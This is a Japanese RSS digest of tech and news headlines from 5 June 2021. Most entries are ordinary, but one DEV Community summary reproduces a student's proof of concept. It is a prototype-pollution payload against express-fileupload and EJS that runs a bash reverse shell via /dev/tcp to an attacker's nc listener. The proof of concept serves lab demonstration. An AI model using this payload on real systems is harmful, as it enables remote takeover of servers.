投稿時間:2021-06-05 21:26:12 RSSフィード2021-06-05 21:00 分まとめ(25件)

カテゴリー等	サイト名等	記事タイトル・トレンドワード等	リンクURL	頻出ワード・要約等/検索ボリューム	登録日
IT	MOONGIFT	WinBox.js - Webアプリ用のウィンドウ管理	http://feedproxy.google.com/~r/moongift/~3/ImgN-P70p-o/	WinBoxjsWebアプリ用のウィンドウ管理Webアプリケーションが次々と登場しており、複雑な画面を持ったものも増えています。	2021-06-05 21:00:00
python	Pythonタグが付けられた新着投稿 - Qiita	MaixduinoのESP32のファームウェアインストールとアナログ入力（Maixpy）	https://qiita.com/ykoji/items/9c71e69e2bf4a7e61d86	MaixduinoのESPのファームウェアインストールとアナログ入力MaixpyはじめにSIPEEDのMaixduinoについては、以前、以下の記事を書きましたが、今回はESPのファームウェアを書き込んでMaixduinoからPythonコードを書くことでアナログ入力の値を取得してみるところまでやってみたいと思います。	2021-06-05 21:00:07
python	Pythonタグが付けられた新着投稿 - Qiita	[Python]Seleniumを利用したWebページのPDF保存方法 メモ	https://qiita.com/KWS_0901/items/33ae052e2e4694a6b4f1	PythonSeleniumを利用したWebページのPDF保存方法メモPythonSeleniumを利用して複数のWebページにアクセスし、それらのページをPDF保存する方法をメモする。	2021-06-05 20:12:22
js	JavaScriptタグが付けられた新着投稿 - Qiita	スマホ＆ブラウザでカメラが使えるか デバイス取得お試し	https://qiita.com/grayhamchan/items/60521b32be80b9ac3005		2021-06-05 20:32:54
js	JavaScriptタグが付けられた新着投稿 - Qiita	WEBブラウザで動画再生お試し	https://qiita.com/grayhamchan/items/a3d3ae225cd0659f9f5a		2021-06-05 20:31:45
js	JavaScriptタグが付けられた新着投稿 - Qiita	画像取得WEBAPI PixabayAPIお試し	https://qiita.com/grayhamchan/items/605346dec7dedbb1171b	画像取得WEBAPIPixabayAPIお試しPixabay公式アカウント作ってAPIキーを取得する。	2021-06-05 20:18:46
Program	[全てのタグ]の新着質問一覧｜teratail（テラテイル）	HTML 文字フォントがテキストと違いがある。	https://teratail.com/questions/342367?rss=all	HTML文字フォントがテキストと違いがある。	2021-06-05 20:35:45
Program	[全てのタグ]の新着質問一覧｜teratail（テラテイル）	つぶやきの投稿が保存されない。	https://teratail.com/questions/342366?rss=all	emptynbspset	2021-06-05 20:31:04
Program	[全てのタグ]の新着質問一覧｜teratail（テラテイル）	【Vue x Firestore】サブコレクション「bookmarks」から投稿情報を取得して表示させたい	https://teratail.com/questions/342365?rss=all	【VuexFirestore】サブコレクション「bookmarks」から投稿情報を取得して表示させたいサブコレクション「bookmarks」から投稿情報を取得して表示させたい。	2021-06-05 20:30:41
Program	[全てのタグ]の新着質問一覧｜teratail（テラテイル）	【Vue x Firestore】子コンポーネントから親コンポーネントで受けたデータをもとに条件をつけてリストを再表示させたい	https://teratail.com/questions/342364?rss=all	【VuexFirestore】子コンポーネントから親コンポーネントで受けたデータをもとに条件をつけてリストを再表示させたい子コンポーネントから親コンポーネントで受けたデータをもとに条件をつけてリストを再表示させたい現状、postvue子コンポーネントにてinputタグで検索窓を作成し、そこで入力された値をemitでboardvue親コンポーネントに渡しています。	2021-06-05 20:28:27
Program	[全てのタグ]の新着質問一覧｜teratail（テラテイル）	Unityで、skyboxを変えても環境光が反映されません	https://teratail.com/questions/342363?rss=all	Unityで、skyboxを変えても環境光が反映されませんfcfaefddaacedbpngnbsp前提・実現したいことUnityで、リアルタイムに昼夜を変更できるようにしたいです。	2021-06-05 20:06:37
Ruby	Rubyタグが付けられた新着投稿 - Qiita	Rubyの標準モジュール「NKF」を使ってみましょうかね。	https://qiita.com/ren0826jam/items/68a64e1be03fef98ecb5	NKFとはNKFモジュールとは文字コードを変換することが出来るRubyの標準ライブラリです。	2021-06-05 21:00:05
Ruby	Rubyタグが付けられた新着投稿 - Qiita	[Ruby]メソッドの引数の値渡し、参照渡しと破壊的メソッドについて	https://qiita.com/Jackson123/items/2434bf0697f2da666deb	Rubyメソッドの引数の値渡し、参照渡しと破壊的メソッドについてはじめにRubyを勉強していて、値渡しと参照渡し、破壊的メソッドの関係について学んだのでメモ学んだこと以下のようなコードを書いていて想定していた動きと違ったので深掘りしてみた。	2021-06-05 20:05:22
Ruby	Railsタグが付けられた新着投稿 - Qiita	Rubyの標準モジュール「NKF」を使ってみましょうかね。	https://qiita.com/ren0826jam/items/68a64e1be03fef98ecb5	NKFとはNKFモジュールとは文字コードを変換することが出来るRubyの標準ライブラリです。	2021-06-05 21:00:05
海外TECH	Ars Technica	There’s hope for American movie theaters after all	https://arstechnica.com/?p=1770060	potential	2021-06-05 11:30:42
海外TECH	DEV Community	Entity-Relationship Diagram	https://dev.to/hebashakeel/entity-relationship-diagram-3jh	Entity Relationship DiagramIt is a high level data model diagram which defines the conceptual view of the database It indicates the relation among entities Before making the actual database first the ER diagram is drawn to show the relations and many more things Components of ER Diagram Entityi It is a real world object ii It can be physical iii It can be logical Entity Set It is a set or collection of entities of the same type which share the similar properties or attributes An entity can be characterized into two types i Strong Entity gt It has a Primary Key gt It is not dependent gt They are shown in single rectangleii Weak Entity gt It doesn t have the sufficient attributes to form Primary Key gt It is dependent on the Strong Entity gt They are shown in double Rectangle ExampleTotal Participation Weak Entity always has total participation with the Relationship This means that each entity in the entity set must compulsorily participate in at least one relationship instance in that relationship set Attributes They are the properties that describe the entity An attribute can be characterized into Simple Attributes They are represented by oval Example Multi valued Attributes Multiple values for a single attribute They are represented by double oval Example Single Valued Attributes Each and every entity will have only one value Example ID Composite Attributes Those attributes that can be divided further Example Derived Attributes Those attributes whose values are derived from another attribute They are represented by dotted oval ExampleAge is a derived attribute since age can be derived from the Date of Birth Key Attribute Attribute which can uniquely define the whole tuple is called a Key Attribute Example ID RelationshipIt indicates how each and every entity is related with every other entity Degree of Relationship A relationship where a number of different entity set participate is called as degree of a relationship Degree of relationship can be categorized into the following types Unary Only one Entity set participates in a relationship Example Binary Two Entity Sets participate in a relationship ExampleIt is further divided into four types i One to One ii One to Many iii Many to One iv Many to Many Ternary When three entity sets participate in a relationship n ary When more than three entity set involves in a relationship it is called n ary relationship Summary of ER Diagram Symbols Entity or Strong Entity Weak Entity Attribute Multi valued Attribute Relationship Weak Relationship That s all for today Thank You Hope to see you in my next article	2021-06-05 11:44:37
海外TECH	DEV Community	Typescript: String Enums, the easy way	https://dev.to/mandraketech/typescript-string-enums-the-easy-way-1ke4	Typescript String Enums the easy wayThe most common use cases for an enum are Keys and associated non string values Keys and string values that match the keysNow don t read this wrong I just don t want to replicate everything that is written in the Typescript Handbook The first one is adequately handled in Typescript Just by using enum MyEnum first second third But the second case looks more like this enum MyStringEnum first first second second third third As the number of values increase it starts getting difficult to manage And I see lot of boilerplate here Also there is scope for mistakes For example it is possible to get into this situation enum MyStringEnum first fifth second second third third In the Handbook look at all the complexity required to do a reverse lookup from the Enums Here is my proposal to build a simple structure that you can implement quickly Lets start with defining the values we want to be the keys in the enum const VALID ENUM VALUES first second third as const Notice the as const at the end of the statement This is what will make the difference Lets define the type that we can use in the code to ensure we are not using any invalid values type MyEnum typeof VALID ENUM VALUES number If you type this in VSCode and hover your mouse over MyEnum you should see that this is the equivalent of defining type MyEnum first second third The number tells Typescript to get all the number based subscripts of the array The additional advantage is if you make changes to the VALID ENUM VALUES array the MyEnum changes with it So if you were to type the following code in the editor console log Valid values of the enum are VALID ENUM VALUES const valueToCheck first console log Check if valueToCheck is part of the enum VALID ENUM VALUES includes valueToCheck Error here because hello is not a value in the VALID ENUM VALUES array const typedVar MyEnum hello Reverse lookups are not necessary But you do want a way to check if a given value is valid in the context of this Enum For that lets write a type asserter function isValid param unknown asserts param is MyEnum assert param amp amp typeof param string amp amp VALID ENUM VALUES includes param as MyEnum Now in this context const myStr first if isValid myStr here if myStr is implicitly of type MyEnum console log myStr is a valid Enum value Another use of this construct is in defining Objects with keys Take a look type MyRecordType Record lt MyEnum unknown gt the myValue below will error because is not a valid valueconst myValue MyRecordType Here the type definition is the equivalent of type MyRecordType first unknown second unknown third unknown You may change the unknown to any relevant type So this gives you a quick way of defining objects with a given structure and defined types Obviously more complex cases are better handled manually Here is another variation of the same type MyPartialRecordType Partial lt MyRecordType gt no error hereconst myPartialValue MyPartialRecordType This is the equivalent of type MyPartialRecordType first unknown second unknown third unknown If you want to use these in combination try this const MUST HAVE PARAMS one two as const type MandatoryParams typeof MUST HAVE PARAMS number const OPTIONAL PARAMS three four as const type OptionalParams typeof OPTIONAL PARAMS number type MixedRecord Record lt MandatoryParams unknown gt amp Partial lt Record lt OptionalParams unknown gt gt This is the equivalent of type MixedRecord one unknown two unknown amp three unknown four unknown or to simplify it further type MixedRecord one unknown two unknown three unknown four unknown So you can now create a Union type Record type and also have a array to validate the values against Another interesting example involving Mapped Types const KNOWN PARAMS TYPES id name as const type KnownParams typeof KNOWN PARAMS TYPES number const UNKNOWN PARAMS TYPES contentsOfWallet as const type UnknownParams typeof UNKNOWN PARAMS TYPES number type AllParams KnownParams UnknownParams type ValueType lt T extends AllParams gt T extends KnownParams string unknown type ParamType Property in AllParams ValueType lt Property gt This is the equivalent of type ParamType id string name string contentsOfWallet unknown This may look like a lot of magic for something that can be defined in less space but look at what is available Arrays of valid field names that can be used for input validation for example when you are dealing with http query strings and want to check if the parameter name is validString union types for use within the application code for those places where you would have otherwise used key of ParamType as the typeA structure that will update itself as you add more parameters to the known unknown parts In summary for cases where you want an array of values to use in various places in the application and still want type safe data structures this kind of organisation will go a long way in making your code extensible using the power of Typescript This blog was originally published by Navneet Karnani navneet mandraketech in on his blog at	2021-06-05 11:30:48
海外TECH	DEV Community	Simple Remote Code Execution on EJS Web Applications with express-fileupload	https://dev.to/boiledsteak/simple-remote-code-execution-on-ejs-web-applications-with-express-fileupload-3325	Simple Remote Code Execution on EJS Web Applications with express fileuploadTLDR with no explainationAs an IT cybersecurity student I heavily relied on searching online for guides and forums to help me with my assignments So this is me giving back to the community In this post I will explain how to exploit a vulnerability in an older version of a NodeJS library to enable RCE Many concepts and technologies used will require anintermmediate level of hands on knowledge of cybersecurityI will not explain every term The entire process is quite simple If you are unfamiliar with anything try read it up Everything mentioned is fairly common This Proof of Concept POC is a simple example of RCE Good for demonstrating RCE to an audience without technical knowledge I doubt it can be used in the wild for penetration testing or for any malicious purposes In fact the author of the dependency has a glaring warning of this vulnerability at the top of their github repoThis exploit was referenced from The author explains why the outdated dependency is vulnerable Disclaimer I am a security student with no professional programming software engineer experience so my code may not be following best practices but they work Contents AbstractSet UpAttackerVictimLaunch Attack Abstract CVE CodeCVE CWE CodeCWE Publish Date July Attack TypeRemote Code ExecutionVulnerabilityJavaScript Prototype PollutionCauseMisconfiguration FixUpdate Libraries Proper Network Configuration FirewallsAffected TechnologyNode Express express fileupload v and earlier EJSback to contents Set Up All files needed can be found in my github repository Higher resolution version of all images used can be found in there too boiledsteak EJS Exploit Remote Code Execution EJS Web Applications using express fileupload Attacker First set up a Kali Virtual Machine VM Ensure all commands are run in bash Check that Python is installed Move this file into the kali VMEJS RCE attack py can be found in my github repo Run this py to perform EJS RCE attack referenced from Timothy November importsimport requests commands to run on victim machinecmd bash c bash i amp gt dev tcp gt amp print Starting Attack polluterequests post files proto outputFunctionName None f x console log process mainModule require child process exec cmd x execute commandrequests get print Finished Yes I know a docker would have been lighter than a VM but the purpose of this POC is more for demonstration so having a VM makes the process more visual Next modify EJS RCE attack py to fit attacker s machine address and port Line change dev tcp to dev tcp lt attacker s IP address gt lt attacker s port to listen for connection from victim gt You could leave it at port Just ensure that no firewall rules are blocking the ports you use Modify EJS RCE attack py to fit victim s machine address and port Line and line Change http address to victim s web address back to contents Victim This part requires a bit more preparation since you will need to set up an EJS web server There s many detailed guides online about EJS and how to create a web app with it so I won t detail everything in this post I ll briefly list the steps needed to get one running First set up an Ubuntu VM Ensure it can talk to the Kali VM Install NodeJS and NPM Create a directory to contain the webserver code It should look something like the screenshot below For now just create the folders Don t create the files yet This step is optional but I feel it makes the webserver cleaner and easier to navigate This step is useful if you choose to expand on my attack scenario for instance adding a database to the webserver adding multiple web pages etc btw command to print directory tree in windows istree AOkay first file to create is package json Move it to backend as pictured in the directory tree screenshot all files can be found in my github repo name some website version description main server js scripts start node server js author license ISC dependencies ejs express express fileupload alpha open a terminal in the backend folder and runnpm installThis installs all needed libraries and dependencies including EJS A node modules folder should appear Now write the server code server js web server code website starts here importsconst express require express const fileupload require express fileupload const http require http const app express app use fileupload parseNested true set the view engine to ejsapp set view engine ejs app set views frontend pages app get req res gt res render index sever starting const server http Server app const addr const port server listen port addr gt console log Server listening on addr port port You ll need to change the addr variable in line to match your victim machine s IP address Next create a simple HTML page in frontend pages It needs to be an ejs file I created a very plain one index ejs This is to show that this attack does not require the victim to click anything on the website The vulnerability lies in an outdated dependency used No XSS needed I probably don t need to show the code but here it is lol lt DOCTYPE html gt lt html gt lt head gt lt title gt Some Website lt title gt lt head gt lt body gt lt h gt This is some website lt h gt lt body gt lt html gt back to contents Launch Attack With everything set up you can finally launch the attack First start the web server from the victim machine Run npm start in the backend directory where the server js file is located Now on the attacker side start a nc to listen for a connection from the victim nc lvp Then start the actual exploitpython EJS RCE attack pyIf everything is done properly you should be seeing a shell of the victim on the attacker s terminal From here you can do all kinds of commands to demonstrate RCE You could do a simple DOS by restarting the machine with init Or maybe do something even more hackerman by downloading a MSFvenom and opening a metasploit shell That s all to the attack It s actually very simple As I said at the start this is just a simple RCE POC to show that misconfiguration can lead to severe vulnerabilities The victim doesn t even need to click anything on the website and yet the web server can be compromised back to contents That s it Thank you for reading my first post Yes I know it s a very simple and amateur exploit but I hope someone finds it useful I m just a student with no real professional experience so some of my information may even be false or misinformed Please let me know if I missed anything You can read more about javascript prototype pollution to understand deeper why this vulnerability even exists	2021-06-05 11:18:36
海外TECH	DEV Community	Summer Plans of a Freshman CS student	https://dev.to/firangizg/summer-plans-of-a-freshman-cs-student-1p68	Summer Plans of a Freshman CS studentHey everyone As summer months have started and I have had a sufficient break after university I was planning on how to spend my summer efficiently since I will be applying for internships in Summer My freshman year as a Computer Engineering student has ended and by the end of the summer I will start my applications so most of the tasks I will try to accomplish by the end of summer will be geared towards that Learn PythonI have been learning Python inefficiently for a long time and think that this free time during the summer could be used efficiently to learn the fundamentals of Python properly To do this I am still searching for good resources but as of now I am planning to follow the interactive textbook of How to Think Like a Computer Scientist Comment down below if you have any other good resources to learn Python well Build Side ProjectsWhile I have doing small tutorial projects like Madlibs or Rock Paper Scissors as an exercise I actually want to do two proper side projects and finish it by the end of the summer I do not need them to be technically complex but rather quality side projects that people would actually use If you have any ideas of nice side projects that let me learn well I am open to suggestions Finish Cracking the Coding Interview BookSince I have not taken a Data Structures and Algorithms class in university yet I am a bit behind on the content of programming interviews so I need to read up on the fundamental data structures and algorithms I have already started reading Cracking the Coding Interview Book and it is very useful Hopefully by the end of the summer I have mastered enough of the topics on the book Grind some Leetcode questionsThis goes along with plan number While the book is great for learning and also doing the exercises help I need more practice with questions that will be similar to the interviews I will potentially do I have compared several practice websites and I also do not want to keep searching and comparing which website is the best to use so I will do the questions in Leetcode even though I am struggling with easy questions right now Attend hackathonsI love hackathons the entrepreneurial and innovative spirit of hackathons excite me And I am most innovative when working with other people so I will attend virtual hackathons over the summer and hopefully make nice projects maybe even win some but that is definitely not the point Well these are my plans for this summer Hopefully that was a fun and insightful read What are your plans for this summer If you are working have an internship how is it going	2021-06-05 11:13:49
海外TECH	DEV Community	Review of Ubuntu after 4 months of daily usage	https://dev.to/krishnakakade/review-of-ubuntu-after-4-months-of-daily-usage-3815	Review of Ubuntu after months of daily usagehello all In this article I will explain of experience of ubuntu after months of daily heavy usage Firstly this my first time regular usage of ubuntu firstly I am a windows guy but I have tried ubuntu a couple of times but not heavy regular usage so in this article I will pros and cons of ubuntu and also the problems I face and how I solved those things Overall UI User Experience review Transitioning to ubuntu after using windows more than years of regular usage firstly I am excited for the change new ecosystem I didn t find any flaws or complications in UI of Ubuntu infact Ubuntu feels like Mac OS to me that is kind of cool thing now question arises what if there is UI freeze kind of thing how I am tackling with UI issuesIn case of windows my laptop is used to show disk usage and because of that my laptop used to freeze daily so then I have to do restart again and again and I having pretty much good hardware gigs of RAM TB hdd but I don t have ssd Now in case of Ubuntu as a primary operating system it s been four months now hardly my UI doc and overall UI freezed less than times and if that happens like user interface not responding then simple fix for that is ALT F and just type r in that box and it s done issue solved sounds cool right but it feels better than sounds cool so no major issues with UI everything works fine So called command syndromeMost developers users think ubuntu is hard to use no that is the myth of the group of folks because as we need to install apps programs in ubuntu manually but there thousand of resources available on the internet like if need to install vscode or lmms there is installation command guide available for that so installing and removing the program is not big task and all development thing works fine and no worries with that every App that developer need that is available in linux Problems for that i didn t got good solution for react native installation doesn t worksome times music breaks not always once in while Only thing i miss in this OS is playing games i tried epic games through lutris but didn t worked that is only sad other thing smooth like butter That s it for this one thank you for reading Should you switch to linux	2021-06-05 11:11:14
海外TECH	Engadget	The Morning After: Which streaming TV box or stick is the best one for you?	https://www.engadget.com/roku-fire-tv-google-tv-tma-113319282.html?src=rss_b2c	highlights	2021-06-05 11:33:19
ニュース	BBC News - Home	G7: Rich nations back deal to tax multinationals	https://www.bbc.co.uk/news/world-57368247	global	2021-06-05 11:33:33
ニュース	BBC News - Home	Covid in Scotland: Restriction levels ease for millions of Scots	https://www.bbc.co.uk/news/uk-scotland-57361513	central	2021-06-05 11:19:37
ニュース	BBC News - Home	Covid: People in hospital with Indian variant not increasing significantly - NHS boss	https://www.bbc.co.uk/news/uk-57367849	illness	2021-06-05 11:18:58
ニュース	Newsweek	「安心安全な五輪」より「安心安全な国民生活」を！	https://www.newsweekjapan.jp/stories/world/2021/06/post-96456.php	菅内閣にとっては、日本国民の命より、東京五輪開催が重要なのだろうか東京五輪開催に習近平がエールを送るという「シグナル」を読み間違えるな習近平が東京五輪開催を支援している理由に関しては月日付のコラムや月日のコラムなどでくり返し書いてきたように、万一にも東京五輪が中止になったら「コロナ感染」が大きくクロースアップされて、習近平にとって不利になるからだ。	2021-06-05 20:12:33